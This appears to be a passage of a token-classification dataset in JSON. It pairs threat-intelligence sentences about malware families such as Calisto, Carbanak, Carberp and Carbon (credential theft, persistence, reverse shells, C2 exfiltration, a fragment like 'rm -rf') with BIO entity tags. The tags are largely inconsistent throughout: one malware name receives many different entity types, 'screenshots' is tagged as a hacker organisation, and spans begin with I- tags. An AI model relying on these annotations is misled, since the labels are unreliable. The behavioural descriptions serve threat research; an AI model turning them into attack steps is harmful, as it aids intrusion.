"tokens": [ - "Cadelspy", - "has", - "the", - "ability", - "to", - "steal", - "information", - "about", - "printers", - "and", - "the", - "documents", - "sent", - "to", - "printers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cadelspy", - "has", - "the", - "ability", - "to", - "capture", - "screenshots", - "and", - "webcam", - "photos." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Cadelspy", - "has", - "the", - "ability", - "to", - "discover", - "information", - "about", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calisto", - "adds", - "permissions", - "and", - "remote", - "logins", - "to", - "all", - "users." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calisto", - "uses", - "the", - "<code>zip", - "-r</code>", - "command", - "to", - "compress", - "the", - "data", - "collected", - "on", - "the", - "local", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calisto", - "collects", - "information", - "on", - "bookmarks", - "from", - "Google", - "Chrome." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calisto", - "can", - "collect", - "data", - "from", - "user", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calisto", - "has", - "the", - "capability", - "to", - "use", - "<code>rm", - "-rf</code>", - "to", - "remove", - "folders", - "and", - "files", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calisto", - "presents", - "an", - "input", - "prompt", - "asking", - "for", - "the", - "user's", - "login", - "and", - "password." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calisto", - "uses", - "a", - "hidden", - "directory", - "named", - ".calisto", - "to", - "store", - "data", - "from", - "the", - "victim’s", - "machine", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calisto", - "has", - "the", - "capability", - "to", - "upload", - "and", - "download", - "files", - "to", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calisto", - "collects", - "Keychain", - "storage", - "data", - "and", - "copies", - "those", - "passwords/tokens", - "to", - "a", - "file." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calisto", - "adds", - "a", - ".plist", - "file", - "to", - "the", - "/Library/LaunchAgents", - "folder", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calisto", - "uses", - "launchctl", - "to", - "enable", - "screen", - "sharing", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calisto", - "has", - "the", - "capability", - "to", - "add", - "its", - "own", - "account", - "to", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calisto", - "uses", - "a", - "hidden", - "directory", - "named", - ".calisto", - "to", - "store", - "data", - "from", - "the", - "victim’s", - "machine", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calisto's", - "installation", - "file", - "is", - "an", - "unsigned", - "DMG", - "image", - "under", - "the", - "guise", - "of", - "Intego’s", - "security", - "solution", - "for", - "mac." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Calisto", - "runs", - "the", - "<code>ifconfig</code>", - "command", - "to", - "obtain", - "the", - "IP", - "address", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CallMe", - "exfiltrates", - "data", - "to", - "its", - "C2", - "server", - "over", - "the", - "same", - "protocol", - "as", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CallMe", - "has", - "the", - "capability", - "to", - "download", - "a", - "file", - "to", - "the", - "victim", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CallMe", - "uses", - "AES", - "to", - "encrypt", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CallMe", - "has", - "the", - "capability", - "to", - "create", - "a", - "reverse", - "shell", - "on", - "victims." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cannon", - "exfiltrates", - "collected", - "data", - "over", - "email", - "via", - "SMTP/S", - "and", - "POP3/S", - "C2", - "channels." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cannon", - "can", - "obtain", - "victim", - "drive", - "information", - "as", - "well", - "as", - "a", - "list", - "of", - "folders", - "in", - "C:\\Program", - "Files." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cannon", - "can", - "download", - "a", - "payload", - "for", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cannon", - "uses", - "SMTP/S", - "and", - "POP3/S", - "for", - "C2", - "communications", - "by", - "sending", - "and", - "receiving", - "emails." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "Cannon", - "can", - "obtain", - "a", - "list", - "of", - "processes", - "running", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cannon", - "can", - "take", - "a", - "screenshot", - "of", - "the", - "desktop." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cannon", - "can", - "gather", - "system", - "information", - "from", - "the", - "victim’s", - "machine", - "such", - "as", - "the", - "OS", - "version,", - "machine", - "name,", - "and", - "drive", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cannon", - "can", - "gather", - "the", - "username", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-Tool", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cannon", - "can", - "collect", - "the", - "current", - "time", - "zone", - "information", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cannon", - "adds", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Microsoft\\Windows", - "NT\\CurrentVersion\\Winlogon</code>", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "exfiltrates", - "data", - "in", - "compressed", - "chunks", - "if", - "a", - "message", - "is", - "larger", - "than", - "4096", - "bytes", - "." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "has", - "a", - "command", - "to", - "delete", - "files." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "logs", - "key", - "strokes", - "for", - "configured", - "processes", - "and", - "sends", - "them", - "back", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "can", - "create", - "a", - "Windows", - "account." - ], - "ner_tags": [ - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "searches", - "recursively", - "for", - "Outlook", - "personal", - "storage", - "tables", - "(PST)", - "files", - "within", - "user", - "directories", - "and", - "sends", - "them", - "back", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "obtains", - "Windows", - "logon", - "password", - "details." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "encrypts", - "strings", - "to", - "make", - "analysis", - "more", - "difficult." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "downloads", - "an", - "executable", - "and", - "injects", - "it", - "directly", - "into", - "a", - "new", - "process." - ], - "ner_tags": [ - "B-Features", - "B-Features", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "lists", - "running", - "processes." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "checks", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet", - "Settings</code>", - "for", - "proxy", - "configurations", - "information." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "stores", - "a", - "configuration", - "files", - "in", - "the", - "startup", - "directory", - "to", - "automatically", - "execute", - "commands", - "in", - "order", - "to", - "persist", - "across", - "reboots." - ], - "ner_tags": [ - "B-Features", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "has", - "a", - "plugin", - "for", - "VNC", - "and", - "Ammyy", - "Admin", - "Tool." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "enables", - "concurrent", - "Remote", - "Desktop", - "Protocol", - "(RDP)", - "sessions." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "performs", - "desktop", - "video", - "recording", - "and", - "captures", - "screenshots", - "of", - "the", - "desktop", - "and", - "sends", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "encodes", - "the", - "message", - "body", - "of", - "HTTP", - "traffic", - "with", - "Base64." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "encrypts", - "the", - "message", - "body", - "of", - "HTTP", - "traffic", - "with", - "RC2", - "(in", - "CBC", - "mode).", - "Carbanak", - "also", - "uses", - "XOR", - "with", - "random", - "keys", - "for", - "its", - "communications." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "The", - "Carbanak", - "malware", - "communicates", - "to", - "its", - "command", - "server", - "using", - "HTTP", - "with", - "an", - "encrypted", - "payload." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "has", - "a", - "command", - "to", - "create", - "a", - "reverse", - "shell." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "queued", - "an", - "APC", - "routine", - "to", - "explorer.exe", - "by", - "calling", - "ZwQueueApcThread." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "installed", - "a", - "bootkit", - "on", - "the", - "system", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "captured", - "credentials", - "when", - "a", - "user", - "performs", - "login", - "through", - "a", - "SSL", - "session." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "hooked", - "several", - "Windows", - "API", - "functions", - "to", - "steal", - "credentials." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Carberp's", - "passw.plug", - "plugin", - "can", - "gather", - "account", - "information", - "from", - "multiple", - "instant", - "messaging,", - "email,", - "and", - "social", - "media", - "services,", - "as", - "well", - "as", - "FTP,", - "VNC,", - "and", - "VPN", - "clients." - ], - "ner_tags": [ - "B-Way", - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Carberp's", - "passw.plug", - "plugin", - "can", - "gather", - "passwords", - "saved", - "in", - "Opera,", - "Internet", - "Explorer,", - "Safari,", - "Firefox,", - "and", - "Chrome." - ], - "ner_tags": [ - "B-Way", - "B-SamFile", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "B-Tool", - "I-Tool", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "attempted", - "to", - "disable", - "security", - "software", - "by", - "creating", - "a", - "suspended", - "process", - "for", - "the", - "security", - "software", - "and", - "injecting", - "code", - "to", - "delete", - "antivirus", - "core", - "files", - "when", - "the", - "process", - "is", - "resumed." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp's", - "bootkit", - "can", - "inject", - "a", - "malicious", - "DLL", - "into", - "the", - "address", - "space", - "of", - "running", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "used", - "XOR-based", - "encryption", - "to", - "mask", - "C2", - "server", - "locations", - "within", - "the", - "trojan." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "exfiltrated", - "data", - "via", - "HTTP", - "to", - "already", - "established", - "C2", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "exploited", - "multiple", - "Windows", - "vulnerabilities", - "(CVE-2010-2743,", - "CVE-2010-3338,", - "CVE-2010-4398,", - "CVE-2008-1084)", - "and", - "a", - ".NET", - "Runtime", - "Optimization", - "vulnerability", - "for", - "privilege", - "escalation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "B-Features", - "B-Features", - "O", - "O", - "B-Way", - "B-Tool", - "B-SecTeam", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "created", - "a", - "hidden", - "file", - "in", - "the", - "Startup", - "folder", - "of", - "the", - "current", - "user." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "can", - "download", - "and", - "execute", - "new", - "plugins", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "masqueraded", - "as", - "Windows", - "system", - "file", - "names,", - "as", - "well", - "as", - "\"chkntfs.exe\"", - "and", - "\"syscron.exe\"." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "used", - "the", - "NtQueryDirectoryFile", - "and", - "ZwQueryDirectoryFile", - "functions", - "to", - "hide", - "files", - "and", - "directories." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "collected", - "a", - "list", - "of", - "running", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "searched", - "the", - "Image", - "File", - "Execution", - "Options", - "registry", - "key", - "for", - "\"Debugger\"", - "within", - "every", - "subkey." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "maintained", - "persistence", - "by", - "placing", - "itself", - "inside", - "the", - "current", - "user's", - "startup", - "folder." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "used", - "user", - "mode", - "rootkit", - "techniques", - "to", - "remain", - "hidden", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "can", - "capture", - "display", - "screenshots", - "with", - "the", - "screens_dll.dll", - "plugin." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "queried", - "the", - "infected", - "system's", - "registry", - "searching", - "for", - "specific", - "registry", - "keys", - "associated", - "with", - "antivirus", - "products." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "collected", - "the", - "operating", - "system", - "version", - "from", - "the", - "infected", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "can", - "start", - "a", - "remote", - "VNC", - "session", - "by", - "downloading", - "a", - "new", - "plugin." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "removed", - "various", - "hooks", - "before", - "installing", - "the", - "trojan", - "or", - "bootkit", - "to", - "evade", - "sandbox", - "analysis", - "or", - "other", - "analysis", - "software." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carberp", - "has", - "connected", - "to", - "C2", - "servers", - "via", - "HTTP." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Carbon", - "has", - "used", - "RSA", - "encryption", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "decrypts", - "task", - "and", - "configuration", - "files", - "for", - "execution." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "has", - "a", - "command", - "to", - "inject", - "code", - "into", - "a", - "process." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "uses", - "HTTP", - "to", - "send", - "data", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "creates", - "a", - "base", - "directory", - "that", - "contains", - "the", - "files", - "and", - "folders", - "that", - "are", - "collected." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "uses", - "TCP", - "and", - "UDP", - "for", - "C2." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "encrypts", - "configuration", - "files", - "and", - "tasks", - "for", - "the", - "malware", - "to", - "complete", - "using", - "CAST-128", - "algorithm." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "uses", - "the", - "<code>net", - "group</code>", - "command." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "can", - "list", - "the", - "processes", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "enumerates", - "values", - "in", - "the", - "Registry." - ], - "ner_tags": [ - "B-SecTeam", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "uses", - "the", - "<code>net", - "view</code>", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "creates", - "several", - "tasks", - "for", - "later", - "execution", - "to", - "continue", - "persistence", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "can", - "collect", - "the", - "IP", - "address", - "of", - "the", - "victims", - "and", - "other", - "computers", - "on", - "the", - "network", - "using", - "the", - "commands:", - "<code>ipconfig", - "-all</code>", - "<code>nbtstat", - "-n</code>,", - "and", - "<code>nbtstat", - "-s</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "Carbon", - "uses", - "the", - "<code>netstat", - "-r</code>", - "and", - "<code>netstat", - "-an</code>", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "uses", - "the", - "command", - "<code>net", - "time", - "\\\\127.0.0.1</code>", - "to", - "get", - "information", - "the", - "system’s", - "time." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "can", - "use", - "HTTP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "can", - "use", - "Pastebin", - "to", - "receive", - "C2", - "commands." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbon", - "establishes", - "persistence", - "by", - "creating", - "a", - "service", - "and", - "naming", - "it", - "based", - "off", - "the", - "operating", - "system", - "version", - "running", - "on", - "the", - "current", - "machine." - ], - "ner_tags": [ - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "applies", - "compression", - "to", - "C2", - "traffic", - "using", - "the", - "ZLIB", - "library." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "and", - "its", - "watchdog", - "component", - "are", - "compiled", - "and", - "executed", - "after", - "being", - "delivered", - "to", - "victims", - "as", - "embedded,", - "uncompiled", - "source", - "code." - ], - "ner_tags": [ - "B-Tool", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "decodes", - "many", - "of", - "its", - "artifacts", - "and", - "is", - "decrypted", - "(AES-128)", - "after", - "being", - "downloaded." - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "encodes", - "many", - "of", - "its", - "artifacts", - "and", - "is", - "encrypted", - "(AES-128)", - "when", - "downloaded." - ], - "ner_tags": [ - "B-Tool", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Cardinal", - "RAT", - "can", - "communicate", - "over", - "multiple", - "C2", - "host", - "and", - "port", - "combinations." - ], - "ner_tags": [ - "I-SamFile", - 